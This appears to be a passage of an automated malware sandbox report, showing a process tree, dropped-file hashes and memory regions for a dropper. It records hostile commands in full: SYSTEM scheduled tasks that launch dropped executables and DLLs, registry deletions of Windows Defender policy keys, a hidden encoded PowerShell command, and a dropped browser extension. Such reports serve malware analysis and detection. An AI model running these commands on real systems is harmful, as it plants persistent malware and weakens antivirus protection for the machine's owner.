                                                                                                            schtasks /run /I /tn "gpNCJFnGM"
                                                                                                            2⤵
                                                                                                              PID:3136
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "gpNCJFnGM"
                                                                                                              2⤵
                                                                                                                PID:3412
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /CREATE /TN "GyQsokuHCPHrPIKjm" /SC once /ST 21:13:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\kowDcWE.exe\" nk /site_id 525403 /S" /V1 /F
                                                                                                                2⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:2300
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /run /I /tn "GyQsokuHCPHrPIKjm"
                                                                                                                2⤵
                                                                                                                  PID:5036
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3356
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  2⤵
                                                                                                                    PID:908
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:3580
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:4580
                                                                                                                    • C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\kowDcWE.exe
                                                                                                                      C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\kowDcWE.exe nk /site_id 525403 /S
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks computer location settings
                                                                                                                      • Drops Chrome extension
                                                                                                                      • Drops desktop.ini file(s)
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:1448
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /DELETE /F /TN "bGKvUxYEKJhmpNiCsB"
                                                                                                                        2⤵
                                                                                                                          PID:1248
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                          2⤵
                                                                                                                            PID:3816
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:2260
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                              2⤵
                                                                                                                                PID:4884
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:3564
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jNivjIkKU\micJLR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ydofTeYvCFRiBkl" /V1 /F
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:1784
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TN "ydofTeYvCFRiBkl2" /F /xml "C:\Program Files (x86)\jNivjIkKU\taARNDf.xml" /RU "SYSTEM"
                                                                                                                                  2⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:4768
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /END /TN "ydofTeYvCFRiBkl"
                                                                                                                                  2⤵
                                                                                                                                    PID:4244
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /DELETE /F /TN "ydofTeYvCFRiBkl"
                                                                                                                                    2⤵
                                                                                                                                      PID:4916
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "LBuWRqeXoiHTKS" /F /xml "C:\Program Files (x86)\HCxyEYsLPoBU2\oOIpNuc.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3108
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "oqzULkuhADdZu2" /F /xml "C:\ProgramData\BsYOAUalmtuIFlVB\hAeNVIS.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:808
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "uNiyNhNrKWiTQIMhb2" /F /xml "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\omkunSD.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3208
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "UeTWhQAkQYvpBfdsNev2" /F /xml "C:\Program Files (x86)\VYxEjiIKDDwYC\pvihkDq.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:4264
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "BTdQtQCLlbasEjBtK" /SC once /ST 10:24:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\SVXwGszHTIpIGNNH\hwVSMBCg\qdrZWwf.dll\",#1 /site_id 525403" /V1 /F
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:5084
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /run /I /tn "BTdQtQCLlbasEjBtK"
                                                                                                                                      2⤵
                                                                                                                                        PID:4888
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                        2⤵
                                                                                                                                          PID:3396
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:2148
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                            2⤵
                                                                                                                                              PID:908
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:2332
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "GyQsokuHCPHrPIKjm"
                                                                                                                                                2⤵
                                                                                                                                                  PID:1752
                                                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SVXwGszHTIpIGNNH\hwVSMBCg\qdrZWwf.dll",#1 /site_id 525403
                                                                                                                                                1⤵
                                                                                                                                                  PID:2384
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SVXwGszHTIpIGNNH\hwVSMBCg\qdrZWwf.dll",#1 /site_id 525403
                                                                                                                                                    2⤵
                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:2516
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /DELETE /F /TN "BTdQtQCLlbasEjBtK"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3480

                                                                                                                                                  Network

                                                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                                                        Replay Monitor

                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                        Downloads

                                                                                                                                                        • C:\Program Files (x86)\HCxyEYsLPoBU2\oOIpNuc.xml

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          4f2ef0385c3d9cafae7fe7b1d9d12f24

                                                                                                                                                          SHA1

                                                                                                                                                          3c96709c1a6d1b59df361c2ddcf1fd6f1ed2f2ef

                                                                                                                                                          SHA256

                                                                                                                                                          0c841b7895ca5029a29ba233c4f8612dc2730f33adfe5ae9acac168964841b72

                                                                                                                                                          SHA512

                                                                                                                                                          ef3057c1eaae4507035d32a2df2088be42cb12141ee2afd1379a4723c00deb6a2cf4d5babc2cd365f6af01f96745dfe436e4476c44de3feef4f56ead43a275cc

                                                                                                                                                        • C:\Program Files (x86)\VYxEjiIKDDwYC\pvihkDq.xml

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          7c79517b2e1e58bb1c055133649d6310

                                                                                                                                                          SHA1

                                                                                                                                                          c9067769c9834a1bf016391be54d5cc0e9cc0eef

                                                                                                                                                          SHA256

                                                                                                                                                          7c31962b9fea32868770a52c89939db9025cee1b040df8cdf57e3cd5fa5c1ce9

                                                                                                                                                          SHA512

                                                                                                                                                          0b705fb51b96085db1d71bd992903391b2eda2a25d6013feb590b88fbbb0091890906c8455bb5f57294c852da014145de87ce804e0740e080e39d31d0581b637

                                                                                                                                                        • C:\Program Files (x86)\jNivjIkKU\taARNDf.xml

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          1e309c3eb482f0ceaae89ca4e376d0f0

                                                                                                                                                          SHA1

                                                                                                                                                          dd9bf8fa6b1c67f638ae9da735145d589b439548

                                                                                                                                                          SHA256

                                                                                                                                                          83427040fb07b4f295bc78ed1226dec04ea41daacafdf2c11769b1b2fb16ccca

                                                                                                                                                          SHA512

                                                                                                                                                          110ac5b50caf3d7f444825b354f2700faa89664cecbe57045f55df15b9af6ed77d0ecf8f58c7cf26e950b154ac90432a0100d4da49e4c2c7ad14bb3e5fbf11db

                                                                                                                                                        • C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\omkunSD.xml

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          71ac6331bb7a3b6fd87393780164950f

                                                                                                                                                          SHA1

                                                                                                                                                          4b01b34a066c944316b9a1a8c47775f8ddeb1e96

                                                                                                                                                          SHA256

                                                                                                                                                          49f0279714c53d22df1e0fbe05059b59c28db00812f3e07379226b8667dfde6a

                                                                                                                                                          SHA512

                                                                                                                                                          5db471f9b6ec0abd59081533731c99b4a1bf6299f7213e8d7ddbdd0ab1658f092292041de0c632c7ca9572882985d780e0e258d438fbbc38ebd91e2feeafa08e

                                                                                                                                                        • C:\ProgramData\BsYOAUalmtuIFlVB\hAeNVIS.xml

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          2b56407255de293280b56c21a74f3ff2

                                                                                                                                                          SHA1

                                                                                                                                                          0ec94e54d3651b9e8417a2e481ca32a361cf143a

                                                                                                                                                          SHA256

                                                                                                                                                          5c6af67fa1141385723412d6cc49b17d3903c0945aa9a7f4c1462cb54ceda2c1

                                                                                                                                                          SHA512

                                                                                                                                                          d85f3df6cf5bbdef0a787ae0e173918b0cc3968c3f449a38822176f7cb29055baafb6b44d4a7056bd49211ebe9d90676f4528ee6449393913c24c537adfc8914

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                          Filesize

                                                                                                                                                          2KB

                                                                                                                                                          MD5

                                                                                                                                                          6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                          SHA1

                                                                                                                                                          24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                          SHA256

                                                                                                                                                          b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                          SHA512

                                                                                                                                                          0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                          Filesize

                                                                                                                                                          64B

                                                                                                                                                          MD5

                                                                                                                                                          7274a07d1b80de6f66290b47588cee3b

                                                                                                                                                          SHA1

                                                                                                                                                          d926b384806c755fe6b9d03f68852765aabb5703

                                                                                                                                                          SHA256

                                                                                                                                                          5eba7517357473e4d5d7ede75c3768069c578d2b0023473fd67f76b373430de8

                                                                                                                                                          SHA512

                                                                                                                                                          b7813fea9091298d48c87b259b0d4473ddc4480667f82ed6b5f8bdfa600590dcbfb1d62cbaca649dcf321d85cb786bf62d48826ab04297a22b7c88439b94bcf3

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSAACB.tmp\Install.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.3MB

                                                                                                                                                          MD5

                                                                                                                                                          50f75202d7ee8fd884fe4a82fd6d5684

                                                                                                                                                          SHA1

                                                                                                                                                          e88dcc4921d7f687d869a98b693ebfd2ce2f52fa

                                                                                                                                                          SHA256

                                                                                                                                                          e35cbe3931cd60b96f1053136950b5e06fa130eddb502435f4cc8896ca2787f2

                                                                                                                                                          SHA512

                                                                                                                                                          288f8f4e8d19086673b8ccb09bd9a868f28df1842643ddc2d8a3741b6a48ae215d5cfe3d24a8f85f9c8b6ef95685be27127249c8e71431dc7ec230214f5db8e5

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSAACB.tmp\Install.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.3MB

                                                                                                                                                          MD5

                                                                                                                                                          50f75202d7ee8fd884fe4a82fd6d5684

                                                                                                                                                          SHA1

                                                                                                                                                          e88dcc4921d7f687d869a98b693ebfd2ce2f52fa

                                                                                                                                                          SHA256

                                                                                                                                                          e35cbe3931cd60b96f1053136950b5e06fa130eddb502435f4cc8896ca2787f2

                                                                                                                                                          SHA512

                                                                                                                                                          288f8f4e8d19086673b8ccb09bd9a868f28df1842643ddc2d8a3741b6a48ae215d5cfe3d24a8f85f9c8b6ef95685be27127249c8e71431dc7ec230214f5db8e5

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSAE27.tmp\Install.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.8MB

                                                                                                                                                          MD5

                                                                                                                                                          96443d2ed3dac1e29958751a3f4f0487

                                                                                                                                                          SHA1

                                                                                                                                                          d20bf0ff83e4c9383f1a20bf564548eed8d5b706

                                                                                                                                                          SHA256

                                                                                                                                                          c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a

                                                                                                                                                          SHA512

                                                                                                                                                          b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSAE27.tmp\Install.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.8MB

                                                                                                                                                          MD5

                                                                                                                                                          96443d2ed3dac1e29958751a3f4f0487

                                                                                                                                                          SHA1

                                                                                                                                                          d20bf0ff83e4c9383f1a20bf564548eed8d5b706

                                                                                                                                                          SHA256

                                                                                                                                                          c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a

                                                                                                                                                          SHA512

                                                                                                                                                          b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\mdUmjmI.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.8MB

                                                                                                                                                          MD5

                                                                                                                                                          96443d2ed3dac1e29958751a3f4f0487

                                                                                                                                                          SHA1

                                                                                                                                                          d20bf0ff83e4c9383f1a20bf564548eed8d5b706

                                                                                                                                                          SHA256

                                                                                                                                                          c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a

                                                                                                                                                          SHA512

                                                                                                                                                          b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2

                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\mdUmjmI.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.8MB

                                                                                                                                                          MD5

                                                                                                                                                          96443d2ed3dac1e29958751a3f4f0487

                                                                                                                                                          SHA1

                                                                                                                                                          d20bf0ff83e4c9383f1a20bf564548eed8d5b706

                                                                                                                                                          SHA256

                                                                                                                                                          c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a

                                                                                                                                                          SHA512

                                                                                                                                                          b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2

                                                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

                                                                                                                                                          Filesize

                                                                                                                                                          717B

                                                                                                                                                          MD5

                                                                                                                                                          ec8ff3b1ded0246437b1472c69dd1811

                                                                                                                                                          SHA1

                                                                                                                                                          d813e874c2524e3a7da6c466c67854ad16800326

                                                                                                                                                          SHA256

                                                                                                                                                          e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

                                                                                                                                                          SHA512

                                                                                                                                                          e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

                                                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9

                                                                                                                                                          Filesize

                                                                                                                                                          503B

                                                                                                                                                          MD5

                                                                                                                                                          621508f17d93fd294e34c57dfa64738d

                                                                                                                                                          SHA1

                                                                                                                                                          62461f51e5b931c49821642bce03bdcff0a03293

                                                                                                                                                          SHA256

                                                                                                                                                          6f69f363bd19069bcad746e7ae100f3efd32e71a91a876d1962e194e07719664

                                                                                                                                                          SHA512

                                                                                                                                                          640c241218f4fb8012c14e29d33473b93ac4382eba3e87d3795a15ba5a4467e8d3e403bc61842434d01115fa5ba237b2282990150993067239a93e7f9b84b970

                                                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

                                                                                                                                                          Filesize

                                                                                                                                                          192B

                                                                                                                                                          MD5

                                                                                                                                                          f2021ee30ad7d36311d915657c0ca79b

                                                                                                                                                          SHA1

                                                                                                                                                          0ed439a4d90ee3f4e0ffa44b9c38f8362d65f1e1

                                                                                                                                                          SHA256

                                                                                                                                                          f42f4a00d17a67e1869a8dc9a7a1edefb6bb4a19cb8767873b900814dee51f90

                                                                                                                                                          SHA512

                                                                                                                                                          465b6c45ee971c03537420cd90d79eddebebc524c5bf99027f055e989fc7c9955cefd88b3ef4876a3b0b7aec07ee88fb0880e8abfec3abd9d05fe73cad52fe9f

                                                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9

                                                                                                                                                          Filesize

                                                                                                                                                          560B

                                                                                                                                                          MD5

                                                                                                                                                          77917636350cafb844fced556ed35c8f

                                                                                                                                                          SHA1

                                                                                                                                                          e5e9ccd299d70e0fd28f1a594993a7786090dcc7

                                                                                                                                                          SHA256

                                                                                                                                                          19c8c8813732171e051e04877f03673787dccd407a8c6d9981e0577c8f7e1a2f

                                                                                                                                                          SHA512

                                                                                                                                                          f75858869b5efef56aa0db78130bae6eb383608edc03f0de8fffca7a813fd397fd49930ef3dca88688c0e2ecb48f95b171f11f91b9bf2a246f2d10ca56f85dc5

                                                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                          Filesize

                                                                                                                                                          1KB

                                                                                                                                                          MD5

                                                                                                                                                          33b19d75aa77114216dbc23f43b195e3

                                                                                                                                                          SHA1

                                                                                                                                                          36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                                                                                                          SHA256

                                                                                                                                                          b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                                                                                                          SHA512

                                                                                                                                                          676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                          Filesize

                                                                                                                                                          11KB

                                                                                                                                                          MD5

                                                                                                                                                          3ab27c53d8ef7b372f3a7b952df7d7aa

                                                                                                                                                          SHA1

                                                                                                                                                          45687bcb87344ca9549b98d9f135bdc4254a3336

                                                                                                                                                          SHA256

                                                                                                                                                          45dc4114a6ed5dd188a4bb48e6d221b5ef1a5f74101a082738a414863f9e8685

                                                                                                                                                          SHA512

                                                                                                                                                          98dcf204b7f59de4792646f1be7fb55e9177551741aa1fb2ab547a03020f22e67c910e170dc6edb72d74dd9ba2fb7516df384a27da9346986e7f1143baaae8bf

                                                                                                                                                        • C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\kowDcWE.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.8MB

                                                                                                                                                          MD5

                                                                                                                                                          96443d2ed3dac1e29958751a3f4f0487

                                                                                                                                                          SHA1

                                                                                                                                                          d20bf0ff83e4c9383f1a20bf564548eed8d5b706

                                                                                                                                                          SHA256

                                                                                                                                                          c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a

                                                                                                                                                          SHA512

                                                                                                                                                          b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2

                                                                                                                                                        • C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\kowDcWE.exe

                                                                                                                                                          Filesize

                                                                                                                                                          6.8MB

                                                                                                                                                          MD5

                                                                                                                                                          96443d2ed3dac1e29958751a3f4f0487

                                                                                                                                                          SHA1

                                                                                                                                                          d20bf0ff83e4c9383f1a20bf564548eed8d5b706

                                                                                                                                                          SHA256

                                                                                                                                                          c8de7ad6edd61baaf04e043c78776d51e84fc91600e566d589059a8dc8d2f35a

                                                                                                                                                          SHA512

                                                                                                                                                          b8cbc648156591878af5fcb1d77cbeeb7ee4bc40fc52895f87f95ca2c655bbded948159d96395669a259e87a74a1df2f8a0ba5dc14dc7e5c3c54a0dd2b3469b2

                                                                                                                                                        • C:\Windows\Temp\SVXwGszHTIpIGNNH\hwVSMBCg\qdrZWwf.dll

                                                                                                                                                          Filesize

                                                                                                                                                          6.2MB

                                                                                                                                                          MD5

                                                                                                                                                          a2d451ef2286310487f54180030fe3d7

                                                                                                                                                          SHA1

                                                                                                                                                          0fc544155cccadd622983805e504183976862241

                                                                                                                                                          SHA256

                                                                                                                                                          f9e91f830d7385fd6c1445dd5b09d865a1296eb7d6a076a152aa7dd642d5f69d

                                                                                                                                                          SHA512

                                                                                                                                                          35aebacfea629f5d70e657370c57aec2b9a80e1460610a2697dd983711118a859f76158a9e9a19357d772a97f6a76fe7ade00ea6097481954bc2ef2ba1ea133c

                                                                                                                                                        • C:\Windows\Temp\SVXwGszHTIpIGNNH\hwVSMBCg\qdrZWwf.dll

                                                                                                                                                          Filesize

                                                                                                                                                          6.2MB

                                                                                                                                                          MD5

                                                                                                                                                          a2d451ef2286310487f54180030fe3d7

                                                                                                                                                          SHA1

                                                                                                                                                          0fc544155cccadd622983805e504183976862241

                                                                                                                                                          SHA256

                                                                                                                                                          f9e91f830d7385fd6c1445dd5b09d865a1296eb7d6a076a152aa7dd642d5f69d

                                                                                                                                                          SHA512

                                                                                                                                                          35aebacfea629f5d70e657370c57aec2b9a80e1460610a2697dd983711118a859f76158a9e9a19357d772a97f6a76fe7ade00ea6097481954bc2ef2ba1ea133c

                                                                                                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                          Filesize

                                                                                                                                                          5KB

                                                                                                                                                          MD5

                                                                                                                                                          c08ca862600a895f056a9793c63ce8c4

                                                                                                                                                          SHA1

                                                                                                                                                          c1663953c6a769a334df049f9261b1c93a7dc9d4

                                                                                                                                                          SHA256

                                                                                                                                                          f38dd7a41ee55cb192533f61882d9a6e70c4c2c0b6ea1dfc40a89b8331c2f1a0

                                                                                                                                                          SHA512

                                                                                                                                                          768acf32be3651a3a1e5d1387877a287845fe34cf8b8af54cf902f3a413f15e59e3fc7d08bde95d89e211a4db45bfad68828a60f7bcbd5623ce52db2a95760f5

                                                                                                                                                        • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                                                                                                          Filesize

                                                                                                                                                          268B

                                                                                                                                                          MD5

                                                                                                                                                          a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                          SHA1

                                                                                                                                                          1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                          SHA256

                                                                                                                                                          9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                          SHA512

                                                                                                                                                          9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                        • memory/1448-233-0x0000000003CC0000-0x0000000003D2A000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          424KB

                                                                                                                                                        • memory/1448-243-0x0000000004630000-0x00000000046A8000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          480KB

                                                                                                                                                        • memory/1448-229-0x0000000003670000-0x00000000036F5000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          532KB

                                                                                                                                                        • memory/1448-247-0x0000000004820000-0x00000000048D7000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          732KB

                                                                                                                                                        • memory/1992-138-0x0000000010000000-0x0000000010D78000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          13.5MB

                                                                                                                                                        • memory/2516-250-0x0000000002110000-0x0000000002E88000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          13.5MB

                                                                                                                                                        • memory/3356-221-0x00007FFD50000000-0x00007FFD50AC1000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/3356-219-0x00007FFD50000000-0x00007FFD50AC1000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/4796-151-0x0000021A6D610000-0x0000021A6D632000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          136KB

                                                                                                                                                        • memory/4796-154-0x00007FFD50290000-0x00007FFD50D51000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/4796-152-0x00007FFD50290000-0x00007FFD50D51000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          10.8MB

                                                                                                                                                        • memory/4884-163-0x0000000001590000-0x00000000015C6000-memory.dmp

                                                                                                                                                          Filesize

                                                                                                                                                          216KB

